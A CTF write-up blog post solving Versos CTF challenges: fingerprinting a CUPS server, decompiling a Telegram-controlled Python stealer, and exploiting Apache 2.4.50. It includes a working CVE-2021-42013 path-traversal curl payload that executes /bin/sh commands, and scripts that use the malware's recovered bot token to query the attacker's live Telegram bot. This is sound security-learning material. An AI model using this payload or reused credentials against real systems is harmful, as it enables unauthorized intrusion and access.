Versos CTF Competition 2024

Dr.kasbr
4 min read · Dec 3, 2024


Hello Everyone….

This writeup covers all challenges in Versos CTF from the BlackHat MEA CTF 2024.

The Print Revolution - Part 1 (Easy — 10pts)

==============================

So I started with `whatweb`.

This revealed the target server was running `CUPS/2.4.7` with the IPP/2.1 protocol, which pointed to the use of the Common UNIX Printing System (CUPS).

https://app.opencve.io/cve/?&vendor=openprinting&product=cups

https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cups

Next, I researched known vulnerabilities associated with CUPS 2.4.7 and found CVE-2024-47177. This CVE was a critical vulnerability in CUPS that allowed attackers to exploit issues with the IPP service to gain unauthorized access or manipulate print jobs. This could lead to the leakage of sensitive customer data, which aligned with the issue described in the challenge.

CVE-2024-47177 was the specific vulnerability responsible for the data breach in the scenario.

flag == CVE-2024-47177

The Infiltrated Notes - 1 (Medium — 20pts)

==============================

Objective: The goal of this writeup is to document the investigation process and identify the Command-and-Control (C2) platform used by the hacker in the attack on TechSecure Inc.

So here we have a Python executable package; let's try to extract it.

I used https://github.com/extremecoders-re/pyinstxtractor

After that we can decompile the `.pyc` files using PyLingual.io or other decompilers like uncompyle6.

So from here we know the flag for part 1.

Part 1: Name the Command-and-Control (C2) platform used by the hacker.

flag == telegram

The Infiltrated Notes - 2 (Hard — 30pts)

==============================

For part 2 they want:

Identify the hacker or threat actor responsible for the attack?

So let's go back to the source code.

In this case I wasted a very long time trying to find some way to get the username via `telegram_user_id = 5740488052`, but with no result.

Then I got an idea: it's a Telegram bot, so?

The Bot's Commands:

The bot supports several commands that are typically used by hackers for data exfiltration or surveillance:

  • viewFile, listDir, downloadFile: These are likely for accessing files on the victim's machine.
  • screenshot, webcam, video: These commands indicate the hacker is capturing media from the victim's machine, including screenshots and webcam footage.

So the idea was to check if the bot is live or not:

```python
import telebot

# Bot API key and user ID (both recovered from the decompiled sample)
BOT_API_KEY = '7777928708:AAHBUCyAWn4CgbG70zypo3Dtbw7bomOFd20'
USER_ID = 5740488052

# Initialize bot
bot = telebot.TeleBot(BOT_API_KEY)

try:
    # Send /start command to the bot and check response
    response = bot.send_message(USER_ID, "/start")
    print("Bot is live and responded:", response.text)
except Exception as e:
    print(f"Error: {e}")
```

Output:

```
PS C:\Users\Drkasbr> & C:/Users/Drkasbr/AppData/Local/Microsoft/WindowsApps/python3.9.exe c:/Users/Drkasbr/Desktop/ctf/fast/ciso/rev/solve.py
Bot is live and responded: /start
PS C:\Users\Drkasbr>
```

So now let's try to add it to a new group just to find the username.

But while I was trying to find a way to get the ID of the group, I found this.

I forgot that we have the API key here; with the token we can do everything:

```python
import requests

# Bot token recovered from the decompiled sample
BOT_API_KEY = "7777928708:AAHBUCyAWn4CgbG70zypo3Dtbw7bomOFd20"
# getMe returns the bot's own identity (name, username, ...)
url = f"https://api.telegram.org/bot{BOT_API_KEY}/getMe"

response = requests.get(url)
if response.status_code == 200:
    print("Details:", response.json())
else:
    print("GG", response.status_code, response.text)
```

Output:

```
Details: {'ok': True, 'result': {'id': 7777928708, 'is_bot': True, 'first_name': 'Dr_Strike', 'username': 'drstrike_bot', 'can_join_groups': True, 'can_read_all_group_messages': False, 'supports_inline_queries': False, 'can_connect_to_business': False, 'has_main_web_app': False}}
PS C:\Users\Drkasbr>
```

So the flag for

“Identify the hacker or threat actor responsible for the attack?”

flag == Dr_Strike

The RTR160CC (Medium — 20pts)

==============================

So it looks like a machine.

I started with `whatweb` to find the server:

```
┌──(oxfun㉿0xfun)-[~]
└─$ whatweb https://versos-ctf-rtr160cc.chals.io/
https://versos-ctf-rtr160cc.chals.io/ [200 OK] Apache[2.4.50][Default], Country[UNITED STATES][US], HTTPServer[Unix][Apache/2.4.50 (Unix)], IP[143.244.222.116]

┌──(oxfun㉿0xfun)-[~]
└─$
```

In this version there are many CVEs, but we can use CVE-2021-42013.

Or we can do it manually:

```
curl 'https://versos-ctf-rtr160cc.chals.io/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; here is your command '
```

So the flag here will be:

f8928e14ac40
